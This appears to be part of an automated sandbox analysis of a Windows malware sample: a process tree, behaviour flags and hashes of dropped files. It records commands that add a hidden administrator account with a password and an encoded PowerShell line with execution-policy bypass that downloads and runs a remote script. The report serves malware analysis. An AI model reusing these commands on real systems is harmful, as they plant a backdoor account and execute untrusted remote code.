C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:3212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc bSDBzf1f1⤵PID:3808
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc bSDBzf1f2⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc bSDBzf1f3⤵PID:3912
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1796
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3104
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2784
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
67c96019cdd3d72991e5688723e04b69
SHA170434b69423bf634308123660ae80389a7f469e5
SHA256be86f62562d0b3a9f8c46139a849890b170a8b30a1abbc9730f6d4faf47a6868
SHA512bd8122706e33e7dee92e5ac6dec1a2642adb788145a895d87a38b3d28a07298508ea450897a16b5a8d195d90be8a02e0dfa9c901c96b9508567464fc76f637a7
-
MD5
17f82340199aae6e88bdfe8fb2264128
SHA16d7b73aa60342fd591c1c95327f0d83e50459320
SHA2565ecf7a62bfab6f5675c73ca3dfb4815152fa3247d390cb2ee37ac80c338befa1
SHA512ace74bb8dac000f6ab3fbce1cf8f44a75901eca5fff46ef2de778d5d0a103380d0727795cbb12b61e61ff962b055fbd4ecd3d8e6d1738e51e3718a15a1c1e516
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
01e075558a0ce4e9014ce25634f73c8f
SHA10065436d4d8817d2d642f17d94ee57efc1a9089c
SHA256b376725ce3b80dad76ff4bfab1172c46557b39a915456f725891b86e414564ab
SHA51238747148f0d6dce0538dd11a39e488f7ffc50cf1ea4595b13b6252683161ba16e0d53a594c8ae2017d6d62f8ca4620c31796ebee9cfa75f309a0979657a950cb
-
MD5
d0990c13899f52c37abc4a8f87d9437f
SHA108e1b77cc789e9c9eb5aa6bfaeadaf8bb496d4b7
SHA256609984cc5c94524861703155fb251c960f14c8fa208993dcc3fd4cad807e5617
SHA51288b3dd58bbe5d087c82beb954539cf77c1aac48d7068c83eed7eb51a1a28e43c0c7d12fd483054336fc8143b31dda9b2ef60592b0aa2c4fd78b750c9618538bb
-
MD5
7dba4ba1a7798d8aa3a2acae8fb5e1b1
SHA13efd9f454975a605233b95543b3efad429563dd2
SHA2569d4814ab60ee09814ef0edac4a895e82d202a1569f5ec60e3dd39c1ea11a204e
SHA512bf62d952003224dd73b490fa732d767d6af580944e0cf973005eaa125c5efe2377927dbd9ae075656aa6ea8590f0eeefc5b11a9643909bbf4532e8d8bcfb9f71
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
a7bfe3911b9fdeced9ede5fc82f1f7d8
SHA19af810333a8ca774ca69036bf8f4f5ca15e2356d
SHA25663b2a29a096d55b11c0baf02f28c447e1064af2e8684eaf3b60698560f143e08
SHA5123aa21a008f3f0fa5e6ec23964d6c2310d2068463ca9e603ccb94a66111cd67b9a265bddac80832e34377aaaaec333dffcd82d72c8f32476561133e0824373f91
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
55422f10b7d94a8f609c1706db6584fe
SHA1b198b3e6534a308923837bc0350c6a827ec7069c
SHA256b0c4a6438c931c6b5ad32bc147ce24390807be7624df16345d3ade1040124ab4
SHA512e2594a85e40ca55d5aafc5c5b4f54312b9a65fa09fd17e25aeda7c215ee41399c958cbec8eb74fdda18d835c61269124cd4cd7194fa2eb0dee034e47eb2a6053